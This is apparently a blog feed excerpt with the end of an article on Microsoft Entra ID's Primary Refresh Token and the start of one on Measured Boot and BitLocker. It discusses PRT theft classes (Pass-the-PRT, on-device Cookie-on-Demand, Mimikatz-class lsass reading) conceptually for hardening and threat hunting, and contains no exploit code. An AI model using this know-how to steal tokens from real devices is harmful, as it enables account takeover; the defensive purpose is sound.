&lt;p&gt;&lt;strong&gt;Remote Credential Guard versus Azure AD RDP sign-in.&lt;/strong&gt; These two are often introduced together because both involve credentials over RDP, and conflating them is the load-bearing threat-model error in this section. &lt;strong&gt;Remote Credential Guard&lt;/strong&gt; redirects Kerberos credentials over the RDP hop: the client&apos;s TGT is reachable to the remote &lt;code&gt;mstsc&lt;/code&gt; session via a CredSSP-mediated redirection mechanism, so that the remote session can fetch downstream service tickets without re-prompting. It does &lt;em&gt;not&lt;/em&gt; transport PRT material across the connection. &lt;strong&gt;Azure AD RDP sign-in&lt;/strong&gt; -- the separate scenario where the RDP host itself is Entra-joined and accepts an Entra sign-in at session establishment -- is the PRT-mediated path, and it happens at the &lt;em&gt;host&lt;/em&gt; side, not as a redirection from the client.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; If your threat model says &quot;I am redirecting credentials over RDP, therefore my PRT is exposed,&quot; you are reading the Remote Credential Guard documentation wrong. Remote Credential Guard ferries Kerberos tickets between the client &lt;code&gt;mstsc&lt;/code&gt; and the remote session host; the PRT lives in the client&apos;s LSASS and does not cross the RDP wire under that feature. Azure AD RDP sign-in is the separate, host-side scenario where the remote session establishes its own PRT against Entra. The Stage 0a audit flagged this conflation as one of the most common errors in the wild, and the Microsoft Learn pages are not co-located.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The pattern across all five is the same. PRT is the cloud-mediated authentication path. Kerberos is the on-prem authentication path. Credential Guard is the on-prem long-term-credential isolation path. Adminless is the local-authorization pattern. App Identity is the workload-authentication path. Remote Credential Guard is an on-prem credential redirection over RDP. They run alongside each other on a modern Windows endpoint; they answer different questions. Mistaking the PRT for any of them is how good threat models go sideways.&lt;/p&gt;
&lt;h2&gt;9. Theoretical limits&lt;/h2&gt;
&lt;p&gt;The single most important sentence in the W3C Device Bound Session Credentials draft is also the single most important sentence about the PRT -- and it does not mention the PRT at all.&lt;/p&gt;

DBSC will not prevent temporary access to the browser session while the attacker is resident on the user&apos;s device. The private key should be stored as safely as modern operating systems allow, preventing exfiltration of the session private key, but the signing capability will likely still be available for any program running as the user on the user&apos;s device. -- W3C Web Application Security Working Group, Device Bound Session Credentials draft
&lt;p&gt;That paragraph is the architectural lower bound. Every device-bound session credential ever proposed inherits it. The PRT is no exception. Five bounded promises follow.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. The on-device-attacker floor is architectural.&lt;/strong&gt; A hardware-bound key whose &lt;em&gt;signing surface&lt;/em&gt; is reachable by a same-privilege process can be used by that process for the lifetime of its presence. The TPM holds the key; the operating system mediates the signing operation; any process the operating system trusts to talk to CloudAP can ask for a signature. KDFv2 closed &lt;em&gt;off-device&lt;/em&gt; replay because the signing key is now uniquely bound to one cookie -- but the on-device process can simply ask for the next signature. The DBSC working draft is explicit that this is the floor for the entire class [@dbsc-w3c-draft]. The composition argument we will name in §10 is the practical response.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. Non-TPM Windows reopens the pre-2021 attack class.&lt;/strong&gt; When the device key and transport key are protected by DPAPI rather than by a TPM 2.0, the key material can be unwrapped with the user&apos;s profile credentials. Pre-2021 Pass-the-PRT becomes available again because the attacker is no longer trying to extract a derived signing key from &lt;code&gt;lsass&lt;/code&gt; -- they are extracting the &lt;em&gt;root&lt;/em&gt; of the derivation from disk. Microsoft Learn names &quot;TPM 2.0 on Windows 10 1903 or higher&quot; as the supported configuration; everything else is best-effort [@prt-msft-learn]. TPM 2.0 is load-bearing, not optional, for the security claims this article makes.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Phishing-resistance inheritance is one-shot.&lt;/strong&gt; The PRT records the authentication strength of the &lt;em&gt;issuing&lt;/em&gt; credential -- whether the user signed in with Hello for Business, a FIDO2 key, a password, or a password plus an MFA factor. The &lt;code&gt;mfa&lt;/code&gt; claim on the PRT carries this through to downstream tokens. If the user authenticated with a phishable factor at issuance, every downstream access token transitively trusts that weaker factor for the PRT lifetime. The PRT does &lt;em&gt;not&lt;/em&gt; upgrade. To enforce phishing-resistant authentication, the deployer must configure Conditional Access Authentication Strengths at the Entra ID side -- the PRT will record what arrived, but it will not refuse to mint downstream tokens because the issuing factor was weak.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4. CAE coverage is not universal.&lt;/strong&gt; Continuous Access Evaluation is the time dimension of revocation -- but only for CAE-aware resources. Exchange Online, SharePoint Online, Teams, and Microsoft Graph honor the claim-challenge protocol; many other workloads still treat the access token as valid until its native expiry [@cae-learn]. If your tenant&apos;s risk surface is a CAE-unaware first- or third-party application, the deployment-time guarantee is the access token&apos;s natural lifetime, not 15 minutes.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;5. The PRT lifetime is 90 days by design.&lt;/strong&gt; A device offline for more than the PRT lifetime cannot silently refresh; the user will see a re-authentication prompt the next time the device reaches Entra ID. That window is the Conditional Access trade-off: longer windows reduce friction for travelers and offline scenarios; shorter windows reduce the attacker&apos;s window after a device compromise. Microsoft chose 90 days; the deployer can tune it via Conditional Access Sign-In Frequency policies but cannot move it independently of the broader refresh-token configuration.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; To approximate the ideal -- a device-bound, near-real-time-revocable, phishing-resistant cross-app SSO credential -- a deployer composes: &lt;strong&gt;PRT&lt;/strong&gt; (device binding) + &lt;strong&gt;CAE&lt;/strong&gt; (near-real-time revocation) + &lt;strong&gt;Token Protection&lt;/strong&gt; (per-resource device binding for native apps) + &lt;strong&gt;Authentication Strengths&lt;/strong&gt; (Conditional Access policy that upgrades phishing resistance at issuance) + &lt;strong&gt;DBSC&lt;/strong&gt; (per-origin web defense once it is available). No single artifact closes all five gaps; composition is the deployer&apos;s job, and the gaps in any one artifact are the joints another is supposed to cover.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Four of the five limits are bounded -- TPM rollout, claim-strength policy, CAE rollout, offline cadence. They get smaller as Microsoft ships, as administrators tighten policy, as more resources become CAE-aware. One is architectural and applies to every device-bound session credential ever proposed: same-device admin equals access while the admin has it. That is the open problem the next section traces.&lt;/p&gt;
&lt;h2&gt;10. Open problems&lt;/h2&gt;
&lt;p&gt;Five open problems sit on the PRT model right now. None of them have a &quot;just ship a patch&quot; answer.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cookie-on-Demand on the live device.&lt;/strong&gt; The architectural defense is bounded by the §9 floor. Mollema&apos;s TROOPERS 22 talk makes the case that &lt;strong&gt;trustlet-level isolation&lt;/strong&gt; of the PRT signing path -- moving the CloudAP cookie-construction code from normal &lt;code&gt;lsass&lt;/code&gt; into an isolated user-mode environment in VTL1, the same security boundary that protects LSAISO -- would close the residual class [@troopers22-mollema-pdf]. Microsoft has not shipped that move. The cost is non-trivial: every downstream broker (WAM, the browser SSO surface, every native app that talks to CloudAP) would need to route through a trustlet-mediated signing API, and the trustlet itself would need to make policy decisions about which callers are entitled to a cookie. The benefit is real -- it removes the same-user-attacker class for the most powerful credential on the device -- but the engineering cost has not been deemed worth it as of 2026.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cross-vendor near-real-time revocation.&lt;/strong&gt; CAE works inside the Microsoft Entra perimeter. If a user is compromised at Entra and Microsoft revokes the session, the signal does not automatically propagate to Okta-protected resources, Google Workspace, AWS IAM Identity Center, or any other identity provider the same user happens to have a session against. The standardization vehicle exists: the OpenID Shared Signals Framework defines a cross-IdP event-receiver protocol, and the OpenID CAEP specification provides the event taxonomy [@caep-openid-spec]. The bilateral transmit/receive deployments are sparse. Stage 3 of the research pipeline found no public production cross-vendor CAE deployment that wires Entra revocation events into a non-Microsoft IdP. The standard is ready; the deployments are not.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;DBSC and PRT composition for browser SSO.&lt;/strong&gt; Google&apos;s Device Bound Session Credentials began general availability for Chrome 146 on Windows in late 2025, with Microsoft co-designing the standard through the W3C process [@dbsc-google-blog] [@dbsc-w3c-draft]. The Chrome developer documentation references Chrome 145 as the rollout-start build, and the Google security blog references Chrome 146 as the GA build; the version drift reflects a phased rollout, and the article uses the later figure [@dbsc-chrome-developer]. The composition question is unresolved: when a browser on Windows visits &lt;code&gt;login.microsoftonline.com&lt;/code&gt;, the request will carry both a DBSC-bound short cookie (per-origin) and an &lt;code&gt;x-ms-RefreshTokenCredential&lt;/code&gt; cookie from the WAM attachment path. Which binding wins, and how the two bindings are composed in the resource provider&apos;s evaluation, has not been publicly documented. The Stage 3 research found no Microsoft engineering blog explaining the contract.The Chrome developer documentation page on DBSC cites &quot;Chrome 145&quot; while the Google Security Blog post about DBSC GA cites &quot;Chrome 146.&quot; The two pages are co-published by Google; the security blog is dated later in 2025 and represents the GA figure. Stage 4 flagged this as an internal-inconsistency artifact. The article uses Chrome 146 for the GA framing and notes Chrome 145 as the rollout-start build [@dbsc-chrome-developer] [@dbsc-google-blog].&lt;/p&gt;

A modern Windows Edge session against `login.microsoftonline.com` already carries `x-ms-RefreshTokenCredential`. A modern Chrome 146 session on Windows carries a DBSC-bound short cookie for the same origin. Token Protection enforces device binding for *native-app* access-token requests, not browser ones. The three bindings are not redundant -- they cover different surfaces -- but Microsoft has not published a precedence rule or a unified &quot;this is how the browser proves device binding to Entra&quot; reference, and the open question is whether the W3C DBSC draft will be the home for that contract or whether Microsoft will document the composition independently. The composition story for browser SSO is, in 2026, the single most active open problem in this space.
&lt;p&gt;&lt;strong&gt;PRT-aware Conditional Access for AI agents and workload identities.&lt;/strong&gt; As organizations deploy autonomous AI agents that act on behalf of users -- Copilot agents, Office Studio bots, third-party LangGraph-style systems -- the identity story is genuinely unsettled. Some agents authenticate as the user via delegated permissions on a PRT-mediated path. Others authenticate as their own service principal via Workload Identity Federation. Conditional Access policies designed for human users -- &quot;require compliant device, require MFA, require sign-in frequency under four hours&quot; -- do not map cleanly to either. Microsoft Entra Agent ID entered public preview at Ignite 2025 with Conditional Access extended to agent identities via custom security attributes and agent-identity-blueprint policy targeting [@entra-agent-id-conditional-access], but the precise PRT-side claim semantics for agent-on-behalf-of-user vs autonomous-agent paths are still settling. The Conditional Access for AI Agents sibling article addresses the evolving model in detail.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PRT across RDP.&lt;/strong&gt; There is no clean &quot;redirect PRT&quot; primitive analogous to Remote Credential Guard&apos;s Kerberos redirection. Inside an RDP session to an Entra-joined host, a user can perform an Azure AD RDP sign-in that mints a &lt;em&gt;new&lt;/em&gt; PRT at the host -- but the client&apos;s PRT does not transit the RDP hop. Forensic and operational tooling that wants to know &quot;what PRT does this remote user have, and is it the same as the client&apos;s?&quot; has to query both endpoints separately. Active Microsoft work in this area is referenced in Mollema&apos;s TROOPERS 22 deck, but no public solution has shipped.&lt;/p&gt;
&lt;p&gt;These five problems share an architecture: they are all about composition. The PRT is one of several primitives that have to work together. The next section walks the practical guide for making them work in your environment today.&lt;/p&gt;
&lt;h2&gt;11. Practical guide&lt;/h2&gt;
&lt;p&gt;Here is what you actually do with the PRT this week.&lt;/p&gt;
&lt;h3&gt;Verifying PRT issuance&lt;/h3&gt;
&lt;p&gt;The operator-facing surface is &lt;code&gt;dsregcmd /status&lt;/code&gt;, which prints the PRT state under the &lt;code&gt;SSO State&lt;/code&gt; section. The three fields to read are &lt;code&gt;AzureAdPrt&lt;/code&gt; (Yes if a PRT is present), &lt;code&gt;AzureAdPrtUpdateTime&lt;/code&gt; (the timestamp of the last refresh), and &lt;code&gt;AzureAdPrtExpiryTime&lt;/code&gt; (the absolute expiry on the current PRT, by default 90 days after issuance) [@prt-msft-learn] [@dsregcmd-troubleshoot].&lt;/p&gt;
&lt;p&gt;{&lt;code&gt; // Models the section of dsregcmd /status output you care about. // On a real Windows host, you would run: dsregcmd /status | findstr AzureAdPrt const sampleOutput = \&lt;/code&gt;
+----------------------------------------------------------------------+
| SSO State                                                            |
+----------------------------------------------------------------------+
             AzureAdPrt : YES
       AzureAdPrtUpdateTime : 2026-05-12 09:31:14.000 UTC
       AzureAdPrtExpiryTime : 2026-08-10 09:31:14.000 UTC
        AzureAdPrtAuthority : login.microsoftonline.com/
              EnterprisePrt : NO
`;
const lines = sampleOutput.split(&apos;\n&apos;).filter(l =&amp;gt; l.match(/AzureAdPrt/));
console.log(lines.map(l =&amp;gt; l.trim()).join(&apos;\n&apos;));
// Healthy: AzureAdPrt=YES and AzureAdPrtUpdateTime within the last 4 hours.
`}&lt;/p&gt;
&lt;p&gt;If &lt;code&gt;AzureAdPrt&lt;/code&gt; is &lt;code&gt;NO&lt;/code&gt; on a device that should have one, the most common causes are (a) the device is not actually Entra-joined, (b) the user has never signed in interactively since the last reboot, or (c) the device&apos;s TPM is malfunctioning and CloudAP could not complete the issuance handshake. &lt;code&gt;dsregcmd /status&lt;/code&gt; will print device-state diagnostics directly above the SSO State section that disambiguate these.&lt;/p&gt;
&lt;h3&gt;Forcing PRT renewal&lt;/h3&gt;
&lt;p&gt;The PRT refreshes silently every four hours, driven by CloudAP -- this is the renewal cadence Microsoft Learn documents as the device-side refresh schedule, not a Conditional Access policy [@prt-msft-learn]. To force an out-of-band renewal, the supported path is to sign the user out and back in with a Hello-for-Business gesture or a strong credential. A locked-and-unlocked session does &lt;em&gt;not&lt;/em&gt; generally force a new PRT mint; CloudAP treats unlock as a continuation event, not a fresh issuance.&lt;/p&gt;
&lt;h3&gt;Hunting PRT-mediated sign-ins in Entra logs&lt;/h3&gt;
&lt;p&gt;In the Microsoft Entra audit and sign-in logs, the load-bearing fields are &lt;code&gt;authenticationDetails&lt;/code&gt;, &lt;code&gt;authenticationProcessingDetails&lt;/code&gt;, and the &lt;code&gt;IsCompliantDevice&lt;/code&gt; and &lt;code&gt;DeviceDetail&lt;/code&gt; claims attached to the sign-in event. A sign-in that rode the PRT path will surface a &lt;code&gt;PRT&lt;/code&gt; indicator in &lt;code&gt;authenticationProcessingDetails&lt;/code&gt;. In Microsoft Defender XDR&apos;s advanced-hunting tables, the corresponding views are &lt;code&gt;IdentityLogonEvents&lt;/code&gt; (for on-prem and federated paths) and &lt;code&gt;AADSignInEventsBeta&lt;/code&gt; (for native Entra sign-in events) [@defender-xdr-schema]. The latter is the table to query when looking for unusual &lt;code&gt;x-ms-RefreshTokenCredential&lt;/code&gt;-driven sign-ins -- specifically, sign-ins from device-claim-bearing tokens whose &lt;code&gt;DeviceId&lt;/code&gt; does not match the device&apos;s &lt;code&gt;DeviceId&lt;/code&gt; in Intune.&lt;/p&gt;
&lt;h3&gt;Conditional Access patterns&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Pattern&lt;/th&gt;
&lt;th&gt;What it enforces&lt;/th&gt;
&lt;th&gt;What it cannot enforce&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Require compliant device&lt;/td&gt;
&lt;td&gt;Sign-in only from devices Intune (or a partner MDM) reports as compliant&lt;/td&gt;
&lt;td&gt;Whether the compliance signal is fresh; an attacker who can spoof an Intune compliance attestation passes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Require Microsoft Entra hybrid joined device&lt;/td&gt;
&lt;td&gt;Sign-in only from hybrid-joined devices&lt;/td&gt;
&lt;td&gt;Personal Entra-registered devices that meet compliance&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Require MFA at sign-in&lt;/td&gt;
&lt;td&gt;A fresh MFA factor at PRT issuance&lt;/td&gt;
&lt;td&gt;Whether the MFA factor is phishing-resistant&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Authentication Strengths (FIDO2-only)&lt;/td&gt;
&lt;td&gt;Phishing-resistant credential at issuance, propagated as a strong &lt;code&gt;mfa&lt;/code&gt; claim into the PRT&lt;/td&gt;
&lt;td&gt;Downstream phishability through cookie theft (KDFv2 fix applies; on-device residual remains)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Token Protection for sign-in tokens&lt;/td&gt;
&lt;td&gt;Device-bound assertion required for app-token requests&lt;/td&gt;
&lt;td&gt;Browser sessions (DBSC is the per-origin counterpart)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sign-in Frequency = 4 hours&lt;/td&gt;
&lt;td&gt;Re-authentication every four hours&lt;/td&gt;
&lt;td&gt;The 90-day PRT lifetime independent of sign-in cadence&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The right policy stack for most enterprises is: require compliant device (or hybrid-joined), require Authentication Strengths for privileged users, require Token Protection where the resource supports it, and set a Sign-In Frequency policy that matches your risk appetite. CAE is on by default on modern tenants and does not need explicit opt-in.&lt;/p&gt;
&lt;h3&gt;CAE enablement and tenant configuration&lt;/h3&gt;
&lt;p&gt;CAE was made the default for all Entra tenants at GA on 10 January 2022; the announcement explicitly noted that Microsoft &quot;auto-enabled it for all tenants&quot; [@twu-cae-ga-mirror]. Microsoft Outlook, Microsoft Teams, and Office on Windows are CAE-aware clients [@cae-learn]; third-party apps that want to participate need to implement the claim-challenge protocol. Microsoft Graph clients gain CAE participation by including &lt;code&gt;cp1&lt;/code&gt; in the requested client capabilities [@cae-client-capabilities]. If your tenant is a CAE outlier, the cause is almost always a custom OIDC application that has not implemented the claim challenge.&lt;/p&gt;
&lt;h3&gt;Forensic indicators&lt;/h3&gt;
&lt;p&gt;Three signals deserve hunting attention:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Anomalous &lt;code&gt;x-ms-RefreshTokenCredential&lt;/code&gt; cookie origins.&lt;/strong&gt; A sign-in where the cookie&apos;s IP geolocation does not match the device&apos;s last known location -- particularly across time zones -- is a candidate Pass-the-PRT-Cookie signal even after KDFv2, because the on-device class survives.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Device-claim-bearing tokens whose &lt;code&gt;DeviceId&lt;/code&gt; does not match Intune state.&lt;/strong&gt; An attacker who lifted a PRT off-device cannot mint cookies post-KDFv2, but a cloned &lt;code&gt;DeviceId&lt;/code&gt; claim in a token request is a strong off-the-rails signal in older logs and a useful retrospective hunt for July 2021 and earlier.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;lsass&lt;/code&gt; broker-process anomalies.&lt;/strong&gt; Mimikatz-class memory-reading tools typically attach to &lt;code&gt;lsass&lt;/code&gt; with debug privileges. The current EDR generation (Microsoft Defender for Endpoint, CrowdStrike Falcon, SentinelOne) detects the canonical access patterns; deploy that telemetry, then validate the alert-rule coverage with &lt;code&gt;Get-MpComputerStatus&lt;/code&gt; and the EDR-specific equivalents.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;What NOT to do&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The single biggest operational mistake is to disable the broker because something else is broken. WAM, CloudAP, and the browser SSO surface are not optional add-ons; they are the cryptographic floor your Conditional Access policies are built on. If a particular app is breaking on PRT-mediated sign-in, the right move is to diagnose the broker integration, not to suppress it. Likewise, do not suppress Conditional Access in lieu of trusting the PRT -- the PRT carries claims that Conditional Access evaluates; disabling Conditional Access keeps the claims but throws away the policy engine.&lt;/p&gt;
&lt;/blockquote&gt;

Open an elevated command prompt. Run `dsregcmd /status`. Confirm `AzureAdJoined : YES`, `DeviceId` is populated, and `AzureAdPrt : YES` with a recent `AzureAdPrtUpdateTime`. Then in PowerShell, run `Get-CimInstance -ClassName Win32_Tpm` and confirm the TPM is present, ready, and at spec version 2.0. Finally, in the Entra ID portal, search for the device by `DeviceId` and confirm the registration state, the OS version, and the compliance posture. Those three checks rule out 90% of &quot;is my PRT working?&quot; questions.
&lt;p&gt;That is the PRT -- what it is, how it broke, how Microsoft fixed it, where it stops. Now the FAQ.&lt;/p&gt;
&lt;h2&gt;12. FAQ and closing&lt;/h2&gt;

No. They are different protocols, issued by different authorities, with different lifetimes. A Kerberos TGT is issued by an on-prem Key Distribution Center, lives 10 hours by default, and rides the AS_REQ/AS_REP protocol. A PRT is issued by Microsoft Entra ID, lives 90 days by default, and rides the MS-OAPXBC protocol over HTTPS. Cloud Kerberos Trust *issues a TGT to a PRT holder* via the Microsoft Entra Kerberos partial-TGT mechanism [@cloud-kerberos-trust-learn], but the two artifacts are distinct and serve different protocol clients.

No. The PRT is the cloud-mediated authentication path. On-prem Kerberos still flows through the on-prem KDC for resources protected by the on-prem Active Directory domain. NTLM remains in use for legacy applications until those applications migrate. The PRT, Cloud Kerberos Trust, and the in-progress &quot;NTLM-less&quot; effort together describe a path that *reduces* reliance on NTLM, but they do not delete the on-prem authentication surface on day one.

Not since July 2021. The asymmetric device key (`dkpriv`) signs the PRT *issuance* request -- a single asymmetric signature per PRT mint. The `x-ms-RefreshTokenCredential` cookie, by contrast, is HMAC-signed with `alg: HS256` using a symmetric key derived from the PRT *session key* via the SP800-108 KDF. Under KDFv2, the derivation context binds the cookie&apos;s full payload via `SHA256(ctx || assertion_payload)` [@ms-oapxbc-jwt] [@dimi-3or-de-kdfv2].

No. Dirk-jan Mollema&apos;s seminal PRT-cookie extraction work appeared in two blog posts on `dirkjanm.io` -- 21 July 2020 and 5 August 2020 [@mollema-prt-2020-07] [@mollema-prt-2020-08]. His 2022 conference talk on the same body of research was at TROOPERS 22 in Heidelberg in June 2022, not at DEF CON 30 [@troopers22-abstract]. Mollema&apos;s DEF CON history covers DC 27 (2019), DC 32 (2024), and DC 33 (2025); he did not present at DC 30 (2022) [@dirkjanm-talks-index]. The &quot;DEF CON 2022&quot; anchor that occasionally appears in summaries of the PRT-attack story is a memory error.

Yes. Conditional Access evaluates each *token request*, including app-token requests via the Web Account Manager and `x-ms-RefreshTokenCredential` cookie redemptions at `login.microsoftonline.com`. The PRT carries device-state, MFA, and risk claims; Conditional Access uses those claims plus the resource and request context to allow or deny each request. CAE additionally revokes already-issued long-lived access tokens in near real time when critical events fire [@cae-learn].

No. Microsoft Pluton *is* a TPM 2.0 implementation -- the same TPM 2.0 contract, embedded in the SoC rather than as a discrete chip. The PRT two-key model is unchanged. `dkpriv` and `tkpriv` are TPM 2.0 keys on Pluton just as they are on a discrete TPM 2.0; CloudAP does not branch on TPM provenance in its issuance path.

All three device states issue PRTs at first interactive sign-in. The differences are about device-management posture and which Conditional Access claims attach. **Microsoft Entra registered** is the personal-device / BYOD state -- the device has a cloud identity but is not the primary management surface; the PRT exists but the device is not necessarily compliant in the management sense. **Microsoft Entra joined** is the cloud-primary state -- the device&apos;s primary identity authority is Entra ID. **Microsoft Entra hybrid joined** is the dual state -- the device has both an on-prem AD computer object and an Entra ID device object; both authentication paths are active in parallel. Microsoft documents hybrid join as &quot;an interim step on the road to Microsoft Entra join&quot; for organizations migrating away from on-prem AD [@entra-devices-overview].
&lt;p&gt;The PRT is not a replacement for Kerberos, NTLM, or Credential Guard. It is the cryptographic seam where Windows logon becomes a Microsoft Entra ID transaction -- and the rest of this series is about what runs alongside it: Hello for Business as the issuing credential, WebAuthn and FIDO2 as the per-relying-party authenticator class, Cloud Kerberos Trust as the on-prem bridge, Credential Guard as the on-prem-credential isolation path, Adminless as the local-authorization pattern, App Identity as the workload broker. Each of those articles starts from a question this one raises, and each closes on a question that connects back. The seam is the part you can name when somebody asks how the three sign-ins from §1 are secretly one event.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;entra-id-and-the-primary-refresh-token-how-azure-ad-sign-on-bridges-windows-logo&quot; keyTerms={[
  { term: &quot;Primary Refresh Token (PRT)&quot;, definition: &quot;Device-bound JWT issued by Microsoft Entra ID to CloudAP at first interactive sign-in; cryptographic seam between Windows logon and Entra-mediated SSO.&quot; },
  { term: &quot;CloudAP&quot;, definition: &quot;Cloud Authentication Provider plugin framework in lsass.exe; the Entra ID plugin owns the device-side PRT lifecycle.&quot; },
  { term: &quot;Device key (dkpub/dkpriv)&quot;, definition: &quot;TPM-bound key pair that signs PRT issuance requests; registered with Entra ID at join time.&quot; },
  { term: &quot;Transport key (tkpub/tkpriv)&quot;, definition: &quot;TPM-bound key pair Entra ID uses to wrap session keys; only tkpriv can unwrap them on-device.&quot; },
  { term: &quot;Session key&quot;, definition: &quot;Symmetric proof-of-possession key for the PRT lifetime; signs cookies and app-token requests via SP800-108 KDF derivation.&quot; },
  { term: &quot;x-ms-RefreshTokenCredential&quot;, definition: &quot;HMAC-signed JWT cookie that carries PRT-derived authentication to login.microsoftonline.com from supported browsers.&quot; },
  { term: &quot;KDFv2&quot;, definition: &quot;Post-CVE-2021-33779 derivation rule that mixes SHA256(ctx || payload) into the cookie&apos;s signing-key derivation, closing off-device replay.&quot; },
  { term: &quot;Continuous Access Evaluation (CAE)&quot;, definition: &quot;Near-real-time revocation channel for OAuth access tokens; 15-minute event-propagation upper bound; CAEP-anchored claim-challenge protocol.&quot; },
  { term: &quot;Token Protection&quot;, definition: &quot;Conditional Access session control that requires device-bound assertions for app-token requests; the per-app analogue of PRT device binding.&quot; },
  { term: &quot;Cloud Kerberos Trust&quot;, definition: &quot;Bridge that lets a PRT-bearing device receive on-prem Kerberos TGTs from Entra ID via the AzureADKerberos virtual RODC object.&quot; }
]} questions={[
  { q: &quot;Why is &apos;the PRT cookie is DKey-signed&apos; wrong?&quot;, a: &quot;The device key signs the asymmetric PRT issuance request once per PRT mint. Cookies are HMAC-signed with a symmetric key derived from the session key via SP800-108 KDF; under KDFv2 the derivation context is SHA256(ctx || assertion_payload).&quot; },
  { q: &quot;What did CVE-2021-33779 fix, in one sentence?&quot;, a: &quot;It introduced KDFv2, which binds the cookie&apos;s full payload into the SP800-108 derivation context, so a key derived for one cookie cannot sign another -- killing off-device Pass-the-PRT.&quot; },
  { q: &quot;What does the on-device-attacker floor mean for the PRT?&quot;, a: &quot;A same-privilege attacker on the live device can ask CloudAP to mint a fresh cookie; the TPM signs it, because that is its job. Off-device replay is closed; on-device Cookie-on-Demand is the architectural residual.&quot; },
  { q: &quot;Where does the PRT NOT apply?&quot;, a: &quot;On-prem Kerberos via the on-prem KDC, Credential Guard / LSAISO (NTLM/Kerberos long-term keys), Adminless (authorization), App Identity / workload identities, and Remote Credential Guard (which redirects Kerberos, not PRT).&quot; },
  { q: &quot;How does CAE revoke an in-flight access token?&quot;, a: &quot;Entra fires a CAEP event on a critical change (user deletion, password reset, MFA enable, admin revocation, high user risk). The CAE-aware resource provider issues an HTTP 401 with a claim challenge on the next request; the client re-presents the PRT and Entra evaluates Conditional Access fresh, issuing a new token or denying.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>entra-id</category><category>azure-ad</category><category>windows-authentication</category><category>primary-refresh-token</category><category>tpm</category><category>conditional-access</category><category>identity</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Measured Boot: The TCG Event Log from SRTM to PCR-Bound BitLocker</title><link>https://paragmali.com/blog/measured-boot-the-tcg-event-log-from-srtm-to-pcr-bound-bitlo/</link><guid isPermaLink="true">https://paragmali.com/blog/measured-boot-the-tcg-event-log-from-srtm-to-pcr-bound-bitlo/</guid><description>How Windows turns every byte of firmware, every signed boot manager, and every loaded driver into a single 32-byte hash that decides whether BitLocker unlocks your disk -- and why patching that chain breaks it.</description><pubDate>Tue, 12 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Measured Boot is the system that lets Windows prove what code ran from power-on to logon.** A small immutable block called the CRTM measures the next stage, extending a SHA-256 digest into a TPM register (a PCR); each stage measures its successor, building a hash chain whose final value is uniquely determined by the entire ordered sequence of code that ran. BitLocker seals its Volume Master Key to a subset of those PCRs, so any unexpected change -- firmware update, Secure Boot key rotation, boot-manager swap -- forces a 48-digit recovery prompt. This article walks the chain event by event, explains why bitpixie (CVE-2023-21563) was unstoppable on TPM-only deployments, and gives you the six commands that turn the theory into a Monday-morning operational practice.
&lt;h2&gt;1. Two PCs That Hash Differently&lt;/h2&gt;
&lt;p&gt;At 06:00 on a Tuesday in March 2024, a senior administrator at a 500-seat law firm finishes patching her fleet of Dell OptiPlex 7090s overnight. At 08:42 she has answered her 173rd help-desk ticket, all variations on the same theme: &lt;em&gt;Why is my laptop asking for a 48-digit BitLocker recovery key?&lt;/em&gt; The answer -- the answer the rest of this article exists to make obvious -- is that a single 32-byte SHA-256 register on every machine in her fleet now holds a different number than it did yesterday, and &lt;a href=&quot;https://paragmali.com/blog/bitlocker-on-windows-architecture-attacks-and-the-limits-of-/&quot; rel=&quot;noopener&quot;&gt;BitLocker&apos;s seal&lt;/a&gt; is bound to that number.&lt;/p&gt;
&lt;p&gt;The patch she applied to make the fleet safer is the patch that locked it out.&lt;/p&gt;
&lt;p&gt;Across town a second firm runs Secured-core PCs that ship with System Guard Secure Launch [@ms-learn-secured-core] enabled. Those machines absorb the same overnight UEFI delta without a single recovery prompt. Same vendor patch. Same Microsoft cumulative update. Same hour. Zero tickets. The difference is not the hardware; the difference is which subset of TPM registers BitLocker bound the disk-encryption key to.&lt;/p&gt;

A fixed-width append-only register inside a Trusted Platform Module. PCRs do not store; they *extend*. The TPM rewrites `PCR[N] := H(PCR[N] || measurement)`, where `H` is a cryptographic hash. PCRs reset to zero only at platform reset. A modern TPM 2.0 has 24 PCRs per hash bank, with banks for SHA-1, SHA-256, SHA-384, SHA-512, and SM3-256.

